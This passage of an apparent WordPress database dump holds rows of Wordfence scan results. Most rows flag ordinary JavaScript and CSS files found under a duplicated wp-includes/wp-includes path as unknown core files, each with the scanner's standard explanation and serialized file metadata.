core: wp-includes/wp-includes/js/codemirror/csslint.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/codemirror/csslint.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77493,1675048832,1675048832,'new','knownfile',75,'9e7c1c00d41a3abd44f3631467663b7f','33b92a2ac253f119962e8308a7bc645a','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/esprima.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/codemirror/esprima.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77494,1675048832,1675048832,'new','knownfile',75,'31e2da3a77d3923b273e5885fa339404','4df016b7399fe169dd220333becde7ec','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/fakejshint.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/codemirror/fakejshint.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77495,1675048832,1675048832,'new','knownfile',75,'7400e4d70d13d516051f895bc501f9c5','4d29f33677622451f372d567e3ad5b84','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/htmlhint-kses.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/codemirror/htmlhint-kses.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77496,1675048832,1675048832,'new','knownfile',75,'d6492a7ed334f822b6b5dbab9a27f8a7','bcaaaa5ba796379b38ee22cc7a1b5298','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/htmlhint.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/codemirror/htmlhint.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77497,1675048832,1675048832,'new','knownfile',75,'a375b70adfc548deb21deb053893ed9c','8d3d3d4d673405fb8f8c4cc7db22edc0','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/jsonlint.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/codemirror/jsonlint.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77498,1675048832,1675048832,'new','knownfile',25,'b643e08a202adb65a058deb2585280bd','46bed733584dcf8c23f3504c73332b1c','Old WordPress core file not removed during update: wp-includes/wp-includes/js/colorpicker.js','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/colorpicker.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77499,1675048832,1675048832,'new','knownfile',75,'850aceb1c3a66ac4d93b03907e63b3b2','b6f8a17d244504fa7886626aed910a6f','Unknown file in WordPress core: wp-includes/wp-includes/js/colorpicker.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/colorpicker.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77500,1675048832,1675048832,'new','knownfile',75,'3c31752954063debe37ad766d2914e0c','cfa9cbd5e77921b2cce64c83fddb7691','Unknown file in WordPress core: wp-includes/wp-includes/js/comment-reply.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/comment-reply.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77501,1675048832,1675048832,'new','knownfile',75,'ed313d3dcdc8d9b453d408b4e5428b5e','9d7e69ef1fbc399a367d5023a67a15d1','Unknown file in WordPress core: wp-includes/wp-includes/js/comment-reply.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/comment-reply.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77502,1675048832,1675048832,'new','knownfile',75,'5e55a70dc8fc79a952874ca36bd53f57','82b0f9458e75540a40e2c002165c0efc','Unknown file in WordPress core: wp-includes/wp-includes/js/crop/cropper.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/crop/cropper.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77503,1675048832,1675048832,'new','knownfile',75,'4f42be6f6f02c623639ffcb8797867cd','7426a22ed62233ae94d21a1c2738710e','Unknown file in WordPress core: wp-includes/wp-includes/js/crop/cropper.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/crop/cropper.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77504,1675048832,1675048832,'new','knownfile',75,'ded7369d4f618f86e85a9b4d85b8c4b2','93abedb124a7dff770c1f1ff5ac05142','Unknown file in WordPress core: wp-includes/wp-includes/js/crop/marqueeHoriz.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/crop/marqueeHoriz.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77505,1675048832,1675048832,'new','knownfile',75,'6d70420461870b8dda525eadc6b739bf','829c0eb67175f9949b812e68e9b74256','Unknown file in WordPress core: wp-includes/wp-includes/js/crop/marqueeVert.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/crop/marqueeVert.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77506,1675048832,1675048832,'new','knownfile',75,'dfb79e4cbaec94ad5b055a456f10e8b2','d587befecfe9226f1ba72454f8238fcd','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-base.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/customize-base.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77507,1675048833,1675048833,'new','knownfile',75,'8a8fae3620ad2a827634e40a42ce3814','099b5e7956e76dfbdaa044304d6e2153','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-base.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/customize-base.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77508,1675048833,1675048833,'new','knownfile',75,'1d4e54642c39e11ee78371644d02d8d7','a6fb1a84c1b1eb87e8e4c97e194ed6fe','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-loader.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/customize-loader.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77509,1675048833,1675048833,'new','knownfile',75,'d27c7b21a696ddf8592c69e371540832','5d4cab20dc07c2d50586be30762af050','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-loader.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/customize-loader.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77510,1675048833,1675048833,'new','knownfile',75,'a341945718846606e48ca03146d2c43f','c7e0e843a146ecc45d8ceedad09f3322','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-models.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/customize-models.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77511,1675048833,1675048833,'new','knownfile',75,'ada4cadb803ef4da4da2a5e3f999bea0','3028a7c3becd12614301ad177189629f','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-models.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/customize-models.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77512,1675048833,1675048833,'new','knownfile',75,'a860cd826b5f7b12e0d1d4cb00807f3a','8b4822568e9dd610509a55c38b896ad8','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-preview-nav-menus.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/customize-preview-nav-menus.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77513,1675048833,1675048833,'new','knownfile',75,'8ed287889ebbe7f4b222ad4254fbd6f2','9f002e456f1ca6b55b962254a7a83416','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-preview-nav-menus.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/customize-preview-nav-menus.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77514,1675048833,1675048833,'new','knownfile',75,'e3da0c1078a8f09ed78620b49c8752ff','3108ed5dd8a62c45c6dff7dfc7c0b8f1','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-preview-widgets.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/customize-preview-widgets.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77515,1675048833,1675048833,'new','knownfile',75,'573bef44f73d04c8f610b9d7464beae9','89fbfaa4409fac4d7c3978e61f6920ba','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-preview-widgets.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/customize-preview-widgets.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77516,1675048833,1675048833,'new','knownfile',75,'ea96f831cb15dbd7a18a1eeff5d99554','64dd6d6caa86cba03030d87adf054380','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-preview.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/customize-preview.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77517,1675048833,1675048833,'new','knownfile',75,'e3648fbb385451ce445afdda42ed5b37','82939c18ccbabcaa5ccac35386d7852c','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-preview.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/customize-preview.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77518,1675048833,1675048833,'new','knownfile',75,'0d98060f3b020f94036523d1951e06d9','99378dfab5134b21ebc6be807dc08c83','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-selective-refresh.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/customize-selective-refresh.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77519,1675048833,1675048833,'new','knownfile',75,'3ffd65717c91719bc0bb777e49534220','00d28f87a440a49a363f2d3a0a67316d','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-selective-refresh.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/customize-selective-refresh.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77520,1675048833,1675048833,'new','knownfile',75,'c0d492128e06d723598104dda8572684','ffbc5f1342b96912840405a7221b2382','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-views.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/customize-views.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77521,1675048833,1675048833,'new','knownfile',75,'791825bd917de8fbfcd0f3334c1a7a8e','fcc1a18241bcc76da99d8867b089c596','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-views.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/customize-views.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77522,1675048833,1675048833,'new','knownfile',75,'972629346cea1f6bbc99561f5c4086bf','2bb08d8fbcb4d3461bae8482edaea3cb','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/a11y.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/dist/a11y.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77523,1675048834,1675048834,'new','knownfile',75,'f328a9fa87ba3590aa257cd7d33bb1fc','3b355a04851b39b55452f036e6b3257c','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/a11y.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/a11y.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77524,1675048834,1675048834,'new','knownfile',75,'3e03130f79a351803fc1cc6d5edf14b8','702bf5eff15b2951f05514b52942cd4c','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/annotations.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/annotations.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77525,1675048834,1675048834,'new','knownfile',75,'f35cdb8626c13df8150429ec1c78aa45','01accab31e799e0d97ab6c29566f3027','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/annotations.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/dist/annotations.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77526,1675048834,1675048834,'new','knownfile',75,'87b30d27baf91d42cc5a721f0776a159','dba3de58d38cb9be3d02de10ac3779b0','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/api-fetch.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/api-fetch.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77527,1675048834,1675048834,'new','knownfile',75,'22661950f51e9b293c373b583d0c5128','72aaf5620227f905b87a07be7024aaa1','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/api-fetch.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/api-fetch.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77528,1675048834,1675048834,'new','knownfile',75,'f923b9656cde52b0b31e3005c1c1ebe4','667b0a9fd0e53e03b5b8c4c4fc028264','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/autop.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/dist/autop.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77529,1675048834,1675048834,'new','knownfile',75,'51370dda822a010353308d2bee748e68','3b9dad7dcd65d558abf6cf2d453a6dd6','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/autop.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/autop.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77530,1675048834,1675048834,'new','knownfile',75,'9498636dc73d70dc0c8012b1985a0201','287cf2b18c51c8e8b822025d0d489350','Unknown file in WordPress core: 